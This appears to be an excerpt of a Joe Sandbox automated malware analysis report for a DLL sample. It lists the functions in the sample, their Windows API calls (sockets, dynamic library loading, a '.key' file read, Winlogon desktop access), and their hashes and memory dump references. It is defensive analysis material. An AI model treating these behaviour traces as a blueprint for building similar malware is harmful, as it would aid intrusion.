                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandleOpen$ManagerStart
                                                          • String ID:
                                                          • API String ID: 1485051382-0
                                                          • Opcode ID: de2cff0e2183aa8c2048c1ea4d6f503d246575146b3d388905ddcafbe7147248
                                                          • Instruction ID: a991dfd3618a091cf8bced06e1e14c92db115e9186b32fce010f6c8dd9d2edbc
                                                          • Opcode Fuzzy Hash: de2cff0e2183aa8c2048c1ea4d6f503d246575146b3d388905ddcafbe7147248
                                                          • Instruction Fuzzy Hash: 1AE09B35256621BBF22167149CC5FAB2678FB8DBD0F150205F608961C0CB609C0141AD
                                                          Function 10004F20 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10004F4A
                                                          • CancelIo.KERNEL32(?), ref: 10004F57
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 10004F66
                                                          • closesocket.WS2_32(?), ref: 10004F73
                                                          • SetEvent.KERNEL32(?), ref: 10004F80
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                          • String ID:
                                                          • API String ID: 1486965892-0
                                                          • Opcode ID: 6626a22e340417a29348b83b411036a0a6be5876ad5ce8627d14265979501e30
                                                          • Instruction ID: 7b5b089ba35ea6fa801320ef26441ee9f6e0eb5430616a3962164302b2279ec7
                                                          • Opcode Fuzzy Hash: 6626a22e340417a29348b83b411036a0a6be5876ad5ce8627d14265979501e30
                                                          • Instruction Fuzzy Hash: 81F01275214711AFE6248F64CC88FD777A8BF45711F108B1DF6AE462D0CB70A4488755
                                                          Function 10005B80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,WideCharToMultiByte,?,00000000,00000000), ref: 10005B96
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005B9D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: KERNEL32.dll$WideCharToMultiByte
                                                          • API String ID: 2574300362-2634761684
                                                          • Opcode ID: 3f2dff838d6c50b6e35792f9c3f23f1c7ba8e3bb5a943dbf87fe4b46237b9eb9
                                                          • Instruction ID: 11a70ebfe6614348c4627575f714f8bac5bc37e03cfb6a5d127c6c7937c6bce2
                                                          • Opcode Fuzzy Hash: 3f2dff838d6c50b6e35792f9c3f23f1c7ba8e3bb5a943dbf87fe4b46237b9eb9
                                                          • Instruction Fuzzy Hash: 2541257250421A8FDB18CE2CC8549AFBBD5FBC4354F154A2DF9A6D3280DA70AD0ACB91
                                                          Function 100108B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85sleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100108E8
                                                          • Sleep.KERNEL32(000004D2), ref: 1001098C
                                                            • Part of subcall function 10010790: CloseHandle.KERNEL32(00000000), ref: 10010893
                                                          • DeleteFileA.KERNEL32(?), ref: 1001094D
                                                            • Part of subcall function 10010790: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100107C2
                                                            • Part of subcall function 10010790: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10010837
                                                            • Part of subcall function 10010790: GetFileSize.KERNEL32(00000000,00000000), ref: 10010846
                                                            • Part of subcall function 10010790: #823.MFC42(00000000), ref: 1001084F
                                                            • Part of subcall function 10010790: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10010862
                                                            • Part of subcall function 10010790: #825.MFC42(00000000), ref: 1001088A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$DirectorySystem$#823#825CloseCreateDeleteHandleReadSizeSleep
                                                          • String ID: .key
                                                          • API String ID: 3115437274-343438762
                                                          • Opcode ID: a96574d81c46762344fc3343623d057d93ebf2ababc3c40e8b4745195a2ba852
                                                          • Instruction ID: 6c8f07c80318120aef5ae7d44ab656afb01d193eb1c0889538d79381634ba695
                                                          • Opcode Fuzzy Hash: a96574d81c46762344fc3343623d057d93ebf2ababc3c40e8b4745195a2ba852
                                                          • Instruction Fuzzy Hash: 1E210775B046540BE719D634889076A7BC5FBC1330F58031AF6978B2C2CEF898888755
                                                          Function 10007850 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SHGetSpecialFolderPathA.SHELL32 ref: 10007877
                                                          • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 100078ED
                                                          • CloseHandle.KERNEL32(00000000), ref: 10007917
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateFileFolderHandlePathSpecial
                                                          • String ID: p
                                                          • API String ID: 3113538180-2181537457
                                                          • Opcode ID: 5da1870f2322d6a31bcdac28cb17ebf9f43366c6ecd2797be473c450de5ccda1
                                                          • Instruction ID: fb9301c769810b0d049b01ddbf7940714647d0c15556b6550ef7852ede3c4a13
                                                          • Opcode Fuzzy Hash: 5da1870f2322d6a31bcdac28cb17ebf9f43366c6ecd2797be473c450de5ccda1
                                                          • Instruction Fuzzy Hash: CB210A716006041FE718CA389C46BEB76C5FBC4330F588B2DF96ACB2D1DAF489098750
                                                          Function 10001410 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutWrite), ref: 1000141E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001425
                                                            • Part of subcall function 100014B0: LoadLibraryA.KERNEL32(WINMM.dll,waveOutOpen), ref: 100014C9
                                                            • Part of subcall function 100014B0: GetProcAddress.KERNEL32(00000000), ref: 100014D2
                                                            • Part of subcall function 100014B0: LoadLibraryA.KERNEL32(WINMM.dll,waveOutPrepareHeader), ref: 100014E2
                                                            • Part of subcall function 100014B0: GetProcAddress.KERNEL32(00000000), ref: 100014E5
                                                            • Part of subcall function 100014B0: LoadLibraryA.KERNEL32(WINMM.dll,waveOutGetNumDevs), ref: 100014F5
                                                            • Part of subcall function 100014B0: GetProcAddress.KERNEL32(00000000), ref: 100014F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: WINMM.dll$waveOutWrite
                                                          • API String ID: 2574300362-665518901
                                                          • Opcode ID: 4a4c6bc64acc4bfc1f0c5e94051bfa256714ece8f52ffe926b99e450b8b27139
                                                          • Instruction ID: 94ba89aa586d5954ea77ca1480e0960dd09743874461cbc46f4ab6b518109010
                                                          • Opcode Fuzzy Hash: 4a4c6bc64acc4bfc1f0c5e94051bfa256714ece8f52ffe926b99e450b8b27139
                                                          • Instruction Fuzzy Hash: C211A0762043048FEB08DF68D8C89A6BBE5FB88380B15855DFE468B346DB71EC01DB20
                                                          Function 10009D80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,00000065,?,00000001,00000001,00000001), ref: 10009DAA
                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000065,?,00000001,00000001,00000001), ref: 10009DC6
                                                          • SetFilePointer.KERNEL32 ref: 10009DE4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Pointer$Write
                                                          • String ID: p
                                                          • API String ID: 3847668363-2181537457
                                                          • Opcode ID: aa322e81eecda5844740ab48266e82d2f9faeacbe78758d31681d1f169d9bd49
                                                          • Instruction ID: 1a9338856e1de5b0d7c3f8fb7aa3c1ae0f192f66fa92f10234f7d2b8d6558fe2
                                                          • Opcode Fuzzy Hash: aa322e81eecda5844740ab48266e82d2f9faeacbe78758d31681d1f169d9bd49
                                                          • Instruction Fuzzy Hash: 811127B5608341ABE210DB28CC85F9BB7E9FBD8714F108A0CF99893280D674A9058BA1
                                                          Function 100048B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 10001B80: InitializeCriticalSection.KERNEL32(00000001,?,100048DA,00000000), ref: 10001B98
                                                          • WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateCriticalEventInitializeSectionStartup
                                                          • String ID: a$m
                                                          • API String ID: 1327880603-1958708294
                                                          • Opcode ID: e82e673a30c8e1feecafb6a2e90b74171136679baf06e6cd822636bf2ff756d4
                                                          • Instruction ID: fb24ae0377e714457c16f4a52ba150758387226036423692d2cdc97d3624b5ca
                                                          • Opcode Fuzzy Hash: e82e673a30c8e1feecafb6a2e90b74171136679baf06e6cd822636bf2ff756d4
                                                          • Instruction Fuzzy Hash: 87118B741087809EE321DB28C856BD6BBE4BF19B50F048A5DE4EE472C1DBB96008CB23
                                                          Function 100251B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #823.MFC42(00000014,0036EE80,00000000,?,?,?,?,?,?,?,?,?,?,?,10028BA4,?), ref: 100251B7
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 100251DB
                                                          • wsprintfA.USER32 ref: 10025201
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823GlobalMemoryStatuswsprintf
                                                          • String ID: @
                                                          • API String ID: 1983843647-2766056989
                                                          • Opcode ID: 9b615574f2840556ce8496ca6902c3105b99c888ccf645b6b1d9e367ae7dfecd
                                                          • Instruction ID: d3956e48529f39fac3fb667b05af59f770880b9a4c77528690d984d1b3a31aaa
                                                          • Opcode Fuzzy Hash: 9b615574f2840556ce8496ca6902c3105b99c888ccf645b6b1d9e367ae7dfecd
                                                          • Instruction Fuzzy Hash: 5EF082B96003106BE3109B1CDC45B9B7A95FBC0340F444838F94997351D634A91846E7
                                                          Function 10025D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #823.MFC42(00000014,76730450,00000000,?,?,?,?,?,?,?,?,?,?,?,10028BC0,00000000), ref: 10025D57
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 10025D7B
                                                          • wsprintfA.USER32 ref: 10025DA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823GlobalMemoryStatuswsprintf
                                                          • String ID: @
                                                          • API String ID: 1983843647-2766056989
                                                          • Opcode ID: 9ed444c80c647ea363146e938ab666fc6b212671693a0512f94a68165d732f8d
                                                          • Instruction ID: 43ad135ee27f5122673a5426b71d841963d21037910a495e5e6c48606e3b34eb
                                                          • Opcode Fuzzy Hash: 9ed444c80c647ea363146e938ab666fc6b212671693a0512f94a68165d732f8d
                                                          • Instruction Fuzzy Hash: 14F0A7B96003106FE3109B1CDC45B9B7B95FBC0350F448839F949D7361D534E91846E7
                                                          Function 1002C580 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25threadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 1002C581
                                                          • GetThreadDesktop.USER32(00000000,?,100175AC), ref: 1002C588
                                                            • Part of subcall function 1002BFA0: LoadLibraryA.KERNEL32(USER32.dll,OpenDesktopA,?,?,00000000,1002BD69,00000000), ref: 1002BFBB
                                                            • Part of subcall function 1002BFA0: GetProcAddress.KERNEL32(00000000), ref: 1002BFC4
                                                          • PostMessageA.USER32(0000FFFF,00000312,00000000,002E0003), ref: 1002C5B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Thread$AddressCurrentDesktopLibraryLoadMessagePostProc
                                                          • String ID: Winlogon
                                                          • API String ID: 133172028-744610081
                                                          • Opcode ID: bd120ed92d315bd0790b541289a442660de5a15ef51d2611e8616a85a95fdbe7
                                                          • Instruction ID: f8fc29b68548e4c816e3190044c4a6e36e92d202cca53509085fc4ea7855aff1
                                                          • Opcode Fuzzy Hash: bd120ed92d315bd0790b541289a442660de5a15ef51d2611e8616a85a95fdbe7
                                                          • Instruction Fuzzy Hash: C2E08676E41A7417FA6167B87D4AFDA32089F10740F850270F50999582E654FB8141D5
                                                          Function 100109B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,?,?,1000F32E,?,?,00000000,1001DC8E,?,100FA3E4,?), ref: 100109D0
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100109D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: CreateEventA$KERNEL32.dll
                                                          • API String ID: 2574300362-2476775342
                                                          • Opcode ID: 469b438b5aded452e172ac3230856e7048f68a61c6940f547f20e5805d7e4c6b
                                                          • Instruction ID: 81657b418f3b05921348bdbd49973478ffcbca97394684bddc953fa459c75907
                                                          • Opcode Fuzzy Hash: 469b438b5aded452e172ac3230856e7048f68a61c6940f547f20e5805d7e4c6b
                                                          • Instruction Fuzzy Hash: 6CE08C756403206BE360DFA89C49F867A98EF48701F04881EF349E7281CAB0A840CB68
                                                          Function 10010A10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,CloseHandle,00000000,1000F45B,00000000,00000000,1001DDE5), ref: 10010A23
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10010A2A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: CloseHandle$KERNEL32.dll
                                                          • API String ID: 2574300362-2295661983
